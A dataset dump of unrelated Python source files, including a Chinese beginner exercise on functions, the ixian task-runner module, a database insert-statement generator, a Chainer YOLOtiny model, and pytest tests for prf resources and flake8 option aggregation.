for i in range(1,10+1):
if i==8:
continue
print(i)
print('xx')
'''
#第五周函数学习
#可变参数学习
'''
def fact(n,*b):
s = 1
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s
print (fact(10,2,3,4))
'''
'''
s = 10
def fact(n,*b):
global s
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s,b
a,b = fact(10,2,3,4)
print (a,b)
'''
#局部变量为组合数据类型,且为创建,等同于全局变量。
'''
#eg1
ls = ['d','f']
def func(a):
ls.append(a)
return
func('c')
print(ls)
#eg2
ls = ['d','f']
def func(a):
ls = [] #重新定义了ls,使它被创建成为了局部变量。
ls.append(a)
return
func('c')
print(ls)
'''
'''
dc =lambda a,b : a+b=1 #错误写法,不能赋值
print(dc(10,12))
dc = lambda a,b : a+b #正确方式
print(dc(10,12))
'''
'''
#无参数值的。
dc = lambda :"武汉大学" #其中不能有打印函数
print(dc())
'''
| 12.565517 | 53 | 0.540615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,090 | 0.9803 |
d34b9b0c409e98b0bcb43c6a5a87a43c41b22c61 | 20,499 | py | Python | ixian/task.py | kreneskyp/ixian | 80133e9106e23eeb562c0112dd70bcdfb61986f9 | [
"Apache-2.0"
] | null | null | null | ixian/task.py | kreneskyp/ixian | 80133e9106e23eeb562c0112dd70bcdfb61986f9 | [
"Apache-2.0"
] | null | null | null | ixian/task.py | kreneskyp/ixian | 80133e9106e23eeb562c0112dd70bcdfb61986f9 | [
"Apache-2.0"
] | null | null | null | # Copyright [2018-2020] Peter Krenesky
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import typing
from ixian.check.checker import hash_object
from ixian.config import CONFIG
from ixian.exceptions import AlreadyComplete
from ixian.utils.color_codes import BOLD_WHITE, ENDC, GRAY, OK_GREEN
logger = logging.getLogger(__name__)
TASKS = {}
class TaskRunner(object):
"""
A task is a wrapper around functions that adds in various functionality
such as dependencies and check functions.
func - function to run
category - category to add this task to
check - list of checkers
clean - clean before building
config - list of relevant settings to display in task help
name - name of this task
short_description - short description for task
description - long description for task
parent - parent task (this task will be run first if it is run)
children - tasks this task depends on (They will be run first)
"""
checkers = None
def __init__(
self,
task=None,
func=None,
category=None,
check=None,
clean=None,
config=None,
depends=None,
name=None,
parent=None,
short_description=None,
description=None,
):
self.task = task
self.func = func
self._depends = depends or []
self.category = category.upper() if category else None
self.clean = clean
self.short_description = short_description or ""
self.config = config
# determine task name
if name is not None:
self.name = name
# determine description
self.description = description
# Add task to global registry. Merge virtual target's dependencies if they exist.
if self.name in TASKS:
task_instance = TASKS[self.name]
# The task is virtual if there is no func, replace it.
if task_instance.func is None:
self.add_dependency(*task_instance._depends)
task_instance = self
else:
logger.warning("Duplicate task definition: {}".format(self.name))
else:
task_instance = self
TASKS[self.name] = task_instance
# add task to VirtualTargets if a parent is specified
if parent:
for parent in parent if isinstance(parent, list) else [parent]:
self.add_to_parent(parent)
# Setup checkers, clean method
if check:
if isinstance(check, (list, tuple)):
self.checkers = check
else:
self.checkers = [check]
def __str__(self):
return f"<{type(self).__name__}@{id(self)} func={self.name}>"
def __unicode__(self):
return f"<{type(self).__name__}@{id(self)} func={self.name}>"
def __repr__(self):
return f"<{type(self).__name__}@{id(self)} func={self.name}>"
@property
def in_context(self):
if not self.task:
return False
return self.task.contexts is True or CONFIG.RUN_CONTEXT in self.task.contexts
def add_to_parent(self, name: str):
"""Add a task to as a dependency of a another task.
This is a grouping method that allows modules to inject
dependencies into common targets.
If the target task is not defined a no-op task will be created to wrap
the added tasks.
:param name: name of parent task to add task to
:return: parent task
"""
try:
parent = TASKS[name]
except KeyError:
# VirtualTarget wasn't defined explicitly, or task hasn't been loaded yet.
# create a TaskRunner for the target. If an explicit task is loaded after
# it will replace this and assume the children that were already added.
parent = TaskRunner(name=name)
TASKS[name] = parent
parent.add_dependency(self)
return parent
def __call__(self, *args, **kwargs):
return self.execute(args, **kwargs)
def execute(self, args, **kwargs):
"""Execute this task.
Executes this task including any dependencies that fail their checks.
If a dependency fails it's check then this task will execute even if
it's own checks pass.
Tasks and dependencies may be forced by passing `force=True` or
`force-all=True` as kwargs.
Tasks and dependency clean methods may be run by passing `clean=True`
or `clean-all=False` as kwargs. Clean implies `force=True`.
:param args: args to pass through to the task
:param kwargs: options for task execution
:return: return value from task function
"""
clean_root = kwargs.get("clean", False)
clean_all = kwargs.pop("clean_all", False)
force_root = kwargs.pop("force", False)
force_all = kwargs.pop("force_all", False)
if clean_root:
force_root = True
if clean_all:
clean_root = True
force_all = True
if force_all:
force_root = True
# save force to task instance so it may be referenced downstream
# TODO: this should be passing in `force`
self.force = True
args_as_str = CONFIG.format(" ".join([str(arg) for arg in args]))
logger.debug(f"[exec] {self.name}({args_as_str}) force={force_root} clean={clean_root}")
def execute_node(node, clean, force, args=None):
runner = TASKS[node["name"]]
if runner and runner.clean and clean:
logger.debug(f"Cleaning Task: {runner.clean}")
runner.clean()
complete_dependencies = 0
for dependency in node["dependencies"]:
try:
execute_node(dependency, clean_all, force_all)
except AlreadyComplete:
complete_dependencies += 1
dependencies_complete = complete_dependencies == len(node["dependencies"])
# Execute function if there is one. Targets may not have a function. If any dependency
# was run, then this task must run too.
if runner and runner.func:
passes, checkers = runner.check(force)
if dependencies_complete and passes:
logger.debug(f"[skip] {node['name']}, already complete.")
raise AlreadyComplete()
else:
# set tasks force attribute so it's setup the same as if it were run directly.
runner.task.__task__.force = force
return_value = runner.func(*args or [])
# save checker only after function has completed successfully. Save should be
# called even if force=True
if checkers:
for checker in checkers:
checker.save()
logger.debug(f"[fini] {runner.name}")
return return_value
return execute_node(self.tree(flatten=False), clean_root, force_root, args)
def check(self, force: bool = False) -> (bool, list):
"""Return True if the task is complete based on configured checks.
If the task does not have a checker this method always returns `False`.
:param force: override the check and return True if True.
:return:
"""
checkers = [checker.clone() for checker in self.checkers] if self.checkers else None
passes = False
if self.checkers:
if force:
passes = False
else:
checks = [checker.check() for checker in checkers]
passes = all(checks)
return passes, checkers
def state(self, shallow: bool = True) -> typing.Optional[dict]:
"""
Calculates a dict of state generated from the tasks checkers.
:param shallow: only return hash for dependencies
:return: dict of state returned from checkers
"""
if self.checkers is None and self.depends is None:
return None
checkers = (
[checker.clone() for checker in self.checkers if checker.contribute_to_task_state]
if self.checkers
else None
)
depends = {}
for dependency in self.depends:
name = dependency.name
if shallow:
depends[name] = dependency.hash()
else:
depends[name] = dependency.state()
return {
"depends": depends,
"checks": [
{
"class": f"{type(checker).__module__}.{type(checker).__name__}",
"state": checker.state(),
}
for checker in checkers
],
}
def hash(self):
return hash_object(self.state(shallow=True))
def add_dependency(self, *tasks):
self._depends.extend(tasks)
@property
def depends(self) -> list:
return [
dependency if isinstance(dependency, TaskRunner) else TASKS[CONFIG.format(dependency)]
for dependency in self._depends
]
def render_help(self, buffer) -> None:
"""render the "help" command
Renders ixian internal help for the task. This help should explain
how to use the task via ixian.
Many tasks are proxies to other tools (e.g. npm, pipenv, etc). This
help shouldn't try to replace that. Proxy tasks should indicate as such
and include an example how to reach the tool's built-in help (--help)
combines:
- Name of task
- Docstring as length description
- task status tree
"""
from ixian.config import CONFIG
buffer.write(BOLD_WHITE)
buffer.write("NAME\n")
buffer.write(ENDC)
buffer.write(f" {self.name} -- {self.short_description}\n")
buffer.write(BOLD_WHITE)
buffer.write("\nDESCRIPTION\n")
buffer.write(ENDC)
if self.description:
buffer.write(CONFIG.format(self.description))
if self.config:
buffer.write(BOLD_WHITE)
buffer.write("\nCONFIGURATION\n")
buffer.write(ENDC)
padding = max(len(config) for config in self.config) - 1
for config in self.config:
buffer.write(
" - {key} {value}\n".format(
key="{key}:".format(key=config[1:-1]).ljust(padding),
value=CONFIG.format(config),
)
)
buffer.write(BOLD_WHITE)
buffer.write("\n\nSTATUS\n")
buffer.write(ENDC)
self.render_status(buffer)
def render_status(self, buffer) -> None:
"""render task status.
Display the dependency tree for the task.
Formatting/Readability optimizations:
- Tree trimming: Redundant nodes are trimmed from the status tree.
If A and B both depend on C then C will only be shown once.
"""
def render_task(node, indent=0):
# render task status
if node["name"] is not None:
passes = node["passes"]
if passes:
icon = OK_GREEN + "✔" + ENDC
else:
icon = GRAY + "○" + ENDC
if indent:
spacer = " " * indent
else:
spacer = ""
task_line = f'{spacer}{icon} {node["name"]}\n'
buffer.write(task_line)
indent += 2
for dependency in node["dependencies"]:
render_task(dependency, indent=indent)
render_task(self.status(), indent=0)
def tree(self, dedupe: bool = True, flatten: bool = True) -> dict:
"""
Return tree of tasks, with this task as the root.
:param dedupe: remove duplicates from tree
:param flatten: flatten single item dependcy lists into the parent
:return:
"""
tree = self._build_tree(set([]) if dedupe else None)
if flatten:
tree = flatten_tree(tree)
return tree
def _build_tree(self, seen=None):
"""
Internal method for recursively building task tree
:param seen: should be a Set if deduping.
:return: node in tree
"""
dependencies = []
for dependency in self.depends:
if seen is not None:
if dependency in seen:
continue
seen.add(dependency)
dependencies.append(dependency._build_tree(seen))
return {"name": self.name, "dependencies": dependencies}
def status(self, dedupe: bool = True, flatten: bool = True) -> dict:
"""
Return the task tree augmented with status information
"""
def update(node):
for dependency in node["dependencies"]:
update(dependency)
if node["name"] is not None:
# Run self.check even if children fail their checks. That way the
# checkers (and state) are available.
children_passes = all(
(dependency["passes"] for dependency in node["dependencies"])
)
runner = TASKS[node["name"]]
passes, checkers = runner.check()
node["checkers"] = checkers
# node fails if any children have failed
node["passes"] = passes and children_passes
return node
return update(self.tree(dedupe, flatten))
def flatten_tree(tree: dict, full: bool = False) -> dict:
"""
Flatten an execution tree to make it easier to read.
Task trees are often a single node nested several levels deep. These trees may be collapsed
into a list. The execution order is the same, but it's easier for a human to read.
Before:
- foo
- bar
- xoo
After:
- xoo
- bar
- foo
Before:
- foo
- xar
- bar
- xoo
After:
- foo
- xar
- xoo
- bar
:param tree: Tree to flatten
:param full: Flatten tree into single list
:return: flattened task list
"""
def flatten_node(node: dict) -> list:
"""
Flatten a single node. Always return a list for consistency, even when returning a single
node.
:param node:
:param parent: parent task list to collapse into
:return: flattened node
"""
node = node.copy()
num_dependencies = len(node["dependencies"])
if num_dependencies == 0:
# no dependencies: nothing to flatten, return as-is
return [node]
elif full or num_dependencies == 1:
# flatten dependencies: flatten into single list that includes parent & child
flattened = []
for dependency in node["dependencies"]:
flattened_child = flatten_node(dependency)
flattened.extend(flattened_child)
# clear dependencies, since they are now siblings
# this node is added last since it runs after dependencies
node["dependencies"] = []
flattened.append(node)
return flattened
else:
# multiple dependencies: do not flatten into parent.
#
# Any dependencies that are flattened need to be merged with other dependencies.
# Dependency nodes should either be a single node, or a list of nodes
dependencies = []
for dependency in node["dependencies"]:
flattened = flatten_node(dependency)
dependencies.extend(flattened)
node["dependencies"] = dependencies
return [node]
root = flatten_node(tree)
if len(root) > 1:
# if root's dependencies were flattened into it, then the returned list will have all of
# those dependencies. Create a new root node to contain them all. This keeps the structure
# consistent-ish for downstream consumers. They still have to special case this node, but
# it should be a little simpler since all nodes are of a similar shape
return {"name": None, "dependencies": root}
else:
# a single node, unpack it and return as root.
return root[0]
class Task(object):
"""
Super class for defining ixian tasks.
Task subclasses should define an execute method.
"""
__task__ = None
contexts = ["cli"]
@property
def __func__(self):
if not hasattr(self, "execute"):
raise NotImplementedError("Task classes must implement execute method")
# wrap execute method to curry `self`
def execute(*args, **kwargs):
return self.execute(*args, **kwargs)
return execute
def __new__(cls, *args, **kwargs):
instance = super(Task, cls).__new__(cls, *args, **kwargs)
# TODO: fix needed, for broken tests this causes
# if instance.name not in TASKS:
if cls.__task__ is None not in TASKS:
cls.__task__ = TaskRunner(
task=instance,
func=instance.__func__,
name=instance.name,
category=getattr(instance, "category", None),
depends=getattr(instance, "depends", None),
check=getattr(instance, "check", None),
clean=getattr(instance, "clean", None),
config=getattr(instance, "config", None),
parent=getattr(instance, "parent", None),
short_description=getattr(instance, "short_description", None),
description=cls.__doc__,
)
else:
# In practice task classes should never need to be instantiated more than once.
# Unloading tasks isn't supported at this time, but tests may do that. When that
# happens subsequent tests may see this fail. This msg helps show that happened.
# hopefully this is fixed in a better way when task loading/tree is refactored.
logger.warning(f"Task {instance.name} instantiated but an instance already exists")
return instance
def __call__(self, *args, **kwargs):
type(self).__task__(*args, **kwargs)
class VirtualTarget(Task):
"""
A virtual target is a placeholder task that is used for targets that
don't have a concrete task registered. VirtualTargets may be executed the
same as tasks. When run, they execute dependencies that were registered
with them.
VirtualTargets allow the target to be given a description, dependencies,
and other options. VirtualTargets allow tasks grouping without tight
coupling to a specific target.
Tasks and other VirtualTargets register with another VirtualTarget by
specifying the targets as it's parent. I.e. `parent='my_target'`.
If multiple modules implement VirtualTargets with the same name, then they
will be merged. This allows modules to define the same groupings.
For example, javascript and python modules might both define a `test`
target to encapsulate all tests. Build pipeline tools can be built to
expect the generic `test` target regardless of whether a project use
python, javascript, or any other combination of languages.
If a concrete Task with the same name as VirtualTarget is registered, the
Task will replace the VirtualTarget. Tasks that contribute to the virtual
target act as dependencies, they'll run before any concrete task.
"""
@property
def __func__(self):
return None
| 34.862245 | 98 | 0.592029 | 16,778 | 0.818319 | 0 | 0 | 752 | 0.036678 | 0 | 0 | 9,473 | 0.46203 |
d34d9ab7f21732e1b05d7bd300bd84ebde6c1a49 | 8,421 | py | Python | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 1 | 2016-09-25T16:41:57.000Z | 2016-09-25T16:41:57.000Z | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | null | null | null | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 2 | 2016-09-25T16:48:49.000Z | 2020-05-26T20:00:33.000Z | #!/usr/local/bin/bash
"""
Two options:
1) Build DB-specific data files from meta-data files
2) Build a single file containing all the DB-specific 'insert' statements in the correct dependency
order from meta-data files and XML table files
NOTE:
- The data files must be named "xxx.dat"; for option (2) the corresponding XML table file must be
"xxx.sql"
- For option (2), the data must be tab-separated
$Header: /home/inqwell/cvsroot/dev/scripts/python/meta_to_db_data.py,v 1.1 2009/05/22 22:15:44 sanderst Exp $
$Author: sanderst $
$DateTime: 2009/05/01 17:04:46 $
$Change: 165582 $
"""
import xml.etree.ElementTree as ET
from xml_to_db_utils import get_table_info
from xml_to_db_utils import get_table_creation_order
import xml_to_mysql_utils
import xml_to_oracle_utils
# Mapping from DB type to function taking a Xylinq name and returning its DB-compatible name
_name_func_by_db_type = {
"mysql" : xml_to_mysql_utils.get_db_compatible_name,
"oracle": xml_to_oracle_utils.get_db_compatible_name,
}
# Mapping from DB type to meta-data converter class
_meta_data_converter_cls_by_db_type = {
"mysql" : xml_to_mysql_utils.MetaDataConverter,
"oracle": xml_to_oracle_utils.MetaDataConverter,
}
def meta_data_text_to_db_data_text(meta_data_text, db_type):
"""
Convert a meta-data text into a DB-specific data text.
@param IN meta_data_text Meta-data text
@param IN db_type DB type (MySQL, Oracle, ...)
@return A DB-specific data text
"""
# Get the DB-specific meta-data converter class
try:
meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
except KeyError:
raise Exception("DB type not supported: '%s'" % db_type)
# Convert the meta-data in the data text
db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
return db_data_text
def meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep=None):
"""
Convert a list of meta-data texts (along with table info objects) into a text containing insert
statement for a given database.
@param IN info_and_data_list List of TableInfo object and meta-data text pairs
@param IN db_type DB type (MySQL, Oracle, ...)
@param IN db_statement_sep Separator to use for the insert statements; default: ";"
@return The insert statements as a string
"""
if db_statement_sep is None:
db_statement_sep = ";"
# Get the DB-specific functions/classes
try:
xy_to_db_name_func = _name_func_by_db_type[db_type.lower()]
meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
except KeyError:
raise Exception("DB type not supported: '%s'" % db_type)
# Identify the order of insertion
info_and_data_by_table_name = dict([(item[0].name, item) for item in info_and_data_list])
table_info_list = [item[0] for item in info_and_data_list]
table_order = get_table_creation_order(table_info_list)
# Process each table in the insertion order
output_lines = []
for table_name in table_order:
table_info, meta_data_text = info_and_data_by_table_name[table_name]
# Convert the meta-data in the data text
db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
# Get the DB table and column names
db_table_name = xy_to_db_name_func(table_name)
db_col_names = [xy_to_db_name_func(col_info.name) for col_info in table_info.columns]
db_col_list_str = ", ".join(db_col_names)
nb_col_names = len(db_col_names)
# Process the data rows
rows = db_data_text.splitlines()
for row in rows:
row = row.strip()
if not row or row.startswith("//"):
continue
values = row.split("\t")
if len(values) != nb_col_names:
raise Exception("Incorrect number of values (%d expected):\n%s" % (nb_col_names,
values))
insert_statement = "INSERT INTO %s (%s) VALUES (%s)%s" % (
db_table_name,
db_col_list_str,
", ".join(values),
db_statement_sep)
output_lines.append(insert_statement)
return "\n".join(output_lines)
def main():
import glob
from optparse import OptionParser
import os
parser = OptionParser()
parser.add_option("--mode", dest="mode", help="'data_files' or 'insert_file'")
parser.add_option("--meta_data_dir", dest="meta_data_dir", help="Input directory for meta-data "
"files")
parser.add_option("--xml_dirs", dest="xml_dirs", help="Input directories for XML table files; "
"'insert_file' mode only")
parser.add_option("--out_dir", dest="output_dir", help="Output dir for data files; 'data_files'"
" mode only")
parser.add_option("--out", dest="output_file", help="Output file for insert statements; "
"'insert_file' mode only")
parser.add_option("--db", dest="db_type", help="DB type: MySQL, Oracle, ...")
parser.add_option("--sep", dest="db_statement_sep", help="Separator for the insert statements; "
"'insert_file' mode only")
options, dummy = parser.parse_args()
mode = options.mode
if mode is None:
raise Exception("Missing mandatory argument '--mode'")
meta_data_dir = options.meta_data_dir
if meta_data_dir is None:
raise Exception("Missing mandatory argument '--meta_data_dir'")
db_type = options.db_type
if db_type is None:
raise Exception("Missing mandatory argument '--db'")
if mode == "data_files":
output_dir = options.output_dir
if output_dir is None:
raise Exception("Missing mandatory argument '--out_dir'")
meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
for meta_data_file in meta_data_files:
print "Processing meta-data file %s" % meta_data_file
# Read the data file
fh = open(meta_data_file)
try:
meta_data_text = fh.read()
finally:
fh.close()
# Convert the meta-data into DB-specific data
db_data_text = meta_data_text_to_db_data_text(meta_data_text, db_type)
# Build the DB-specific data file
db_data_file = os.path.join(output_dir, os.path.basename(meta_data_file))
fh = open(db_data_file, "w")
try:
fh.write(db_data_text)
finally:
fh.close()
elif mode == "insert_file":
xml_dir_list = options.xml_dirs
if xml_dir_list is None:
raise Exception("Missing mandatory argument '--xml_dirs'")
xml_dir_list = [item.strip() for item in xml_dir_list.split(",")]
output_file = options.output_file
if output_file is None:
raise Exception("Missing mandatory argument '--out'")
db_statement_sep = options.db_statement_sep
if db_statement_sep:
db_statement_sep = db_statement_sep.replace("\\n", "\n")
info_and_data_list = []
meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
for meta_data_file in meta_data_files:
# Read the corresponding XML table file
for xml_dir in xml_dir_list:
xml_file = os.path.join(xml_dir, "%s.xml" %
os.path.splitext(os.path.basename(meta_data_file))[0])
if os.path.exists(xml_file):
break
else:
raise Exception("No XML table file found for meta-data file %s" % meta_data_file)
table_elt_tree = ET.parse(xml_file)
table_elt = table_elt_tree.getroot()
table_info = get_table_info(table_elt)
# Read the data file
fh = open(meta_data_file)
try:
meta_data_text = fh.read()
finally:
fh.close()
info_and_data_list.append((table_info, meta_data_text))
output_text = meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep)
fh = open(output_file, mode="w")
try:
fh.write(output_text)
finally:
fh.close()
else:
raise Exception("Unknown mode: '%s'" % mode)
if __name__ == "__main__":
main()
| 37.426667 | 109 | 0.652535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,923 | 0.347108 |
d34dea71189d3afc7d4964aa6dbd49339356c594 | 3,806 | py | Python | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | 9 | 2016-12-22T00:49:45.000Z | 2020-02-09T02:02:25.000Z | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils
from chainer import Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
from chainer import training
from chainer.training import extensions
def darknetConv2D(in_channel,out_channel, bn=True):
if (bn):
return Chain(
c = L.Convolution2D(in_channel,out_channel, ksize=3, pad=1,nobias=True),
n = L.BatchNormalization(out_channel,use_beta=False,eps=0.000001),
b = L.Bias(shape=[out_channel,]),
)
else:
return Chain(
c = L.Convolution2D(in_channel,out_channel, ksize=3, pad=1,nobias=True),
b = L.Bias(shape=[out_channel,]),
)
def CRP(c, h, stride=2, pooling=True):
# convolution -> leakyReLU -> MaxPooling
h = c.b( c.n( c.c(h),test=True))
h = F.leaky_relu(h,slope=0.1)
if pooling:
h = F.max_pooling_2d(h,ksize=2,stride=stride,pad=0)
return h
class YOLOtiny(Chain):
def __init__(self):
super(YOLOtiny, self).__init__(
c1 = darknetConv2D(3,16),
c2 = darknetConv2D(None,32),
c3 = darknetConv2D(None,64),
c4 = darknetConv2D(None,128),
c5 = darknetConv2D(None,256),
c6 = darknetConv2D(None,256),
c7 = darknetConv2D(None,512),
c8 = darknetConv2D(None,512),
c9 = darknetConv2D(None,35,bn=False)
)
def __call__(self,x):
return self.predict(x)
def predict(self,x):
h = CRP(self.c1, x)
h = CRP(self.c2, h)
h = CRP(self.c3, h)
h = CRP(self.c4, h)
h = CRP(self.c5, h)
h = CRP(self.c6, h, stride=1)
h = F.get_item(h,(slice(None),slice(None),slice(1,14),slice(1,14))) # x[:,:,0:13,0:13]
h = CRP(self.c7, h, pooling=False)
h = CRP(self.c8, h, pooling=False)
h = self.c9.b( self.c9.c(h)) # no leaky relu, no BN
return h
def loadCoef(self,filename):
print "loading",filename
file = open(filename,"rb")
dat=np.fromfile(file,dtype=np.float32)[4:] # skip header(4xint)
layers=[ [3,16],[16,32], [32,64], [64,128],[128,256],[256,256],[256,512],[512,512]]
offset=0
for i,l in enumerate(layers):
in_ch=l[0]
out_ch=l[1]
# load bias
txt= "self.c%d.b.b.data = dat[%d:%d]" % (i+1, offset, offset+out_ch)
offset+=out_ch
exec(txt)
# load bn
txt= "self.c%d.n.gamma.data = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c%d.n.avg_mean = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c%d.n.avg_var = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
# load convolution weight
txt= "self.c%d.c.W.data = dat[%d:%d].reshape(%d,%d,3,3)" % (i+1, offset, offset+(out_ch*in_ch*9), out_ch,in_ch)
offset+= (out_ch*in_ch*9)
exec(txt)
print offset
# load last convolution weight
in_ch=512
out_ch=35
txt= "self.c9.b.b.data = dat[%d:%d]" % ( offset, offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c9.c.W.data = dat[%d:%d].reshape(%d,%d,1,1)" % ( offset, offset+out_ch*in_ch*1, out_ch,in_ch)
offset+=out_ch*in_ch*1
exec(txt)
print offset
if __name__ == '__main__':
c=YOLOtiny()
im=np.zeros((1,3,416,416),dtype=np.float32)
c.predict(im)
c.loadCoef("tiny-yolo-ppap_final.weights")
serializers.save_npz('YOLOtiny_v2.model',c)
| 31.716667 | 123 | 0.558329 | 2,565 | 0.673936 | 0 | 0 | 0 | 0 | 0 | 0 | 535 | 0.140568 |
d3507046f0a495ed119738fbd0af1510a4ac11db | 3,294 | py | Python | prf/tests/test_resource.py | vahana/_prf | ff947003a3675a22730ca3d821fcb2e230575e7d | [
"MIT"
] | null | null | null | prf/tests/test_resource.py | vahana/_prf | ff947003a3675a22730ca3d821fcb2e230575e7d | [
"MIT"
] | 6 | 2015-01-04T14:49:34.000Z | 2017-11-21T16:26:03.000Z | prf/tests/test_resource.py | vahana/_prf | ff947003a3675a22730ca3d821fcb2e230575e7d | [
"MIT"
] | 1 | 2019-11-14T17:16:34.000Z | 2019-11-14T17:16:34.000Z | import mock
import pytest
from prf.tests.prf_testcase import PrfTestCase
from pyramid.exceptions import ConfigurationExecutionError
from prf.resource import Resource, get_view_class, get_parent_elements
from prf.view import BaseView
class TestResource(PrfTestCase):
def test_init_(self):
res = Resource(self.conf)
assert res.member_name == ''
assert res.collection_name == ''
assert res.parent == None
assert res.uid == ''
with pytest.raises(ValueError):
#member name cant be empty
res.add('', view=BaseView)
def test_repr_(self):
res = Resource(self.conf, 'member', 'collection', uid='uid')
assert 'uid' in res.__repr__()
def test_get_ancestors(self):
root = Resource(self.conf)
one = root.add('one', view=BaseView)
assert one.get_ancestors() == []
two = one.add('two', view=BaseView)
anc = two.get_ancestors()
assert anc[0] == one
def test_add(self):
root = Resource(self.conf)
two = root.add('two', view=BaseView, id_name='two')
assert two.parent == root
assert two.member_name == 'two'
assert two.collection_name == 'twos'
assert two.uid == 'twos'
assert two.is_singular is False
three = two.add('tree', 'trix', view=BaseView, id_name='three')
assert three.parent == two
assert three.member_name == 'tree'
assert three.collection_name == 'trix'
assert three.uid == 'twos:trix'
assert three.is_singular is False
assert three in two.children
four = three.add('four', view=BaseView)
sing = two.add('sing', collection_name=None, view=BaseView)
assert sing.is_singular is True
pref = root.add('five', prefix='pref', view=BaseView)
assert pref.uid == 'pref:fives'
def test_add_id_name(self):
root = Resource(self.conf)
two = root.add('two', view=BaseView, id_name='username')
assert two.id_name == 'username'
three = two.add('tree', view=BaseView, id_name='username')
assert three.path == 'twos/{two_username}/trees'
@mock.patch('prf.resource.maybe_dotted')
def test_get_view_class(self, fake_maybe_dotted):
root = Resource(self.conf)
fake_maybe_dotted.return_value = BaseView
assert get_view_class(BaseView, root) == BaseView
assert get_view_class('prf.view.BaseView', root) == BaseView
fake_maybe_dotted.reset_mock()
def test_get_parent_elements(self):
root = Resource(self.conf)
ppref, npref = get_parent_elements(
root.add('one', view=BaseView).add('two', view=BaseView).add('three', view=BaseView))
assert ppref == 'ones/{one_id}/twos/{two_id}'
assert npref == 'ones:twos:'
@pytest.mark.skip('route_prefix is broken')
def test_get_parent_elements_w_route_prefix(self):
self.conf.route_prefix = 'route_prefix'
root = Resource(self.conf)
ppref, npref = get_parent_elements(
root.add('one', view=BaseView).add('two', view=BaseView).add('three', view=BaseView))
assert ppref == 'route_prefix/ones/{one_id}/twos/{two_id}'
assert npref == 'route_prefix:ones:'
| 33.272727 | 101 | 0.632665 | 3,055 | 0.927444 | 0 | 0 | 787 | 0.238919 | 0 | 0 | 468 | 0.142077 |
d35266f4b7ddd35ff7911005944f1b419af759d9 | 2,004 | py | Python | tests/integration/test_aggregator.py | mananpal1997/flake8 | 1c85f3d07c3aadf597db205dff597da2987745f7 | [
"MIT"
] | null | null | null | tests/integration/test_aggregator.py | mananpal1997/flake8 | 1c85f3d07c3aadf597db205dff597da2987745f7 | [
"MIT"
] | null | null | null | tests/integration/test_aggregator.py | mananpal1997/flake8 | 1c85f3d07c3aadf597db205dff597da2987745f7 | [
"MIT"
] | null | null | null | """Test aggregation of config files and command-line options."""
import os
import pytest
from flake8.main import options
from flake8.options import aggregator
from flake8.options import config
from flake8.options import manager
@pytest.fixture
def optmanager():
"""Create a new OptionManager."""
option_manager = manager.OptionManager(
version="3.0.0",
plugin_versions="",
parents=[],
)
options.register_default_options(option_manager)
return option_manager
@pytest.fixture
def flake8_config(tmp_path):
cfg_s = """\
[flake8]
ignore =
E123,
W234,
E111
exclude =
foo/,
bar/,
bogus/
quiet = 1
"""
cfg = tmp_path.joinpath("tox.ini")
cfg.write_text(cfg_s)
return str(cfg)
def test_aggregate_options_with_config(optmanager, flake8_config):
"""Verify we aggregate options and config values appropriately."""
arguments = [
"flake8",
"--select",
"E11,E34,E402,W,F",
"--exclude",
"tests/*",
]
cfg, cfg_dir = config.load_config(flake8_config, [])
options = aggregator.aggregate_options(
optmanager,
cfg,
cfg_dir,
arguments,
)
assert options.select == ["E11", "E34", "E402", "W", "F"]
assert options.ignore == ["E123", "W234", "E111"]
assert options.exclude == [os.path.abspath("tests/*")]
def test_aggregate_options_when_isolated(optmanager, flake8_config):
"""Verify we aggregate options and config values appropriately."""
arguments = [
"flake8",
"--select",
"E11,E34,E402,W,F",
"--exclude",
"tests/*",
]
cfg, cfg_dir = config.load_config(flake8_config, [], isolated=True)
optmanager.extend_default_ignore(["E8"])
options = aggregator.aggregate_options(optmanager, cfg, cfg_dir, arguments)
assert options.select == ["E11", "E34", "E402", "W", "F"]
assert options.ignore is None
assert options.exclude == [os.path.abspath("tests/*")]
